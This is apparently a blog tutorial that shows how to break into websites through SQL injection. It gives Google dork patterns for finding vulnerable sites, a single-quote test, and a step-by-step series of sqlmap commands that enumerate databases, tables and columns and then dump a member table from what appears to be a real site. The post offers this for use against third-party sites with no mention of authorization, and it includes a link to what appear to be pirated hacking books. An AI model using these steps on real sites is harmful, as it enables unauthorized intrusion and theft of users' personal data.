How to Hack Website Database 2019 (UPDATED)

How to Hack Website Database In 2019 (UPDATED)

Hello, guys in today’s article we are going to see how hackers hack the database of any vulnerable website, so there are many other ways for hacking the database of website but in today’s post we are going to see how to hack website database using SQL Injection.

we can hack the website’s database using two different techniques 1.)  manual way (performing attack manually by passing arguments in URL ) 2.)  automatic injection (SQLMAP)

but in this Article, I am going to use SQLMAP tool if you are beginner then go with the manual way if you can’t find manual way comment below I will try to explain in another article.

So let’s start

What is sql injection?

  • sql injection type of attack which is used to extract website database’s  data without credentials
  • in other words, we can say accessing all personal data of website without credentials of the website
  • we can do many things with sql injection
    • hacking websites (defacement, etc)
    • extracting data from the database
    • login bypass

Step 1:

First, find SQL injection vulnerable website, for that, you can use google dorks

  • GOOGLE Dorks for SQL injection:

    • home.php?cat=
    • view_items.php?id=
    • product.php?sku=
    • main.php?id=

find vulnerable websites using above dorks if you don’t know how to use dorks comment below I will write the article on it

Step 2:

after finding websites check whether a website is vulnerable to SQL injection or not for that put the single quote ( ‘ ) at the end of the URL and hit enter if there is any kind of SQL error then it’s vulnerable else find another website (Example:- https://www.example.com/index.php?id=1′ )

if you get the result similar to below image then it’s vulnerable to SQL injection

Example:

sql_injection

 

Cick here to Downlaod certified etical hacking v10 books :- CERTIFIED ETHICAL HACKING COURSE V10 DOWNLOAD

Step 3:

Now we got a vulnerable website I assume you also got one so let’s begin open your terminal and type (” sqlmap -u ‘https://target-website.pk/index.php?id=1’ –dbs”) without double quotes for fetching databases of the specified website, we did not perform the vulnerability checking stage in sqlmap, cause we manually verified is there SQL injection vulnerability is present in site or not

Example:

The command for fetching database

sqlmap scanning

 

Fetched Database

database hacking

Step 4:

We got database (“dailypak_dailypak”, “information_schema”) names as shown in the above images now we try to fetch available tables inside that database

we are going to fetch tables from ‘dailypak_dailypak’ database for that type following command (” sqlmap -u ‘https://target-website.pk/index.php?id=1’ –tables -D dailypak_dailypak “) without double quotes and press enter

Example:

Fetching Tables

fetching tables

Fetched Tables

fetched tables sqlmap

You may also like: python programming

Step 5:

here we got all the tables that are available in the database now let’s find columns that are available in tables

for that type following command (” sqlmap -u ‘https://target-website.com/index.php?id=1’ –columns -D dailypak_dailypak  -T  member “) without double quotes and press enter

Example:

Fetching Columns

fetch column sqlmap

 

Columns Fetched

fetch column sql map

Step 6:

now we got required columns and we can dump all data that stored inside this table’s columns so let’s dump (fetch) it

type the following command (” sqlmap -u ‘https://target-site.com/index.php?id=1’ –dump -D dailypak_dailypak  -T  member ” ) without double quotes and hit enter it will take some time and then display the result and automatically store in “.csv”  file you can find a path in the bottom of the terminal

Example:

Hacked Database Data

satabase hacked using sqlmap

 

Path of the saved database file

sqlmap save path

 

so friends here’s the tutorial on how to hack website database subscribe to notification for future articles let us know your thoughts on this article by commenting thanks for reading see you again

5 Comments

Add a Comment

Your email address will not be published. Required fields are marked *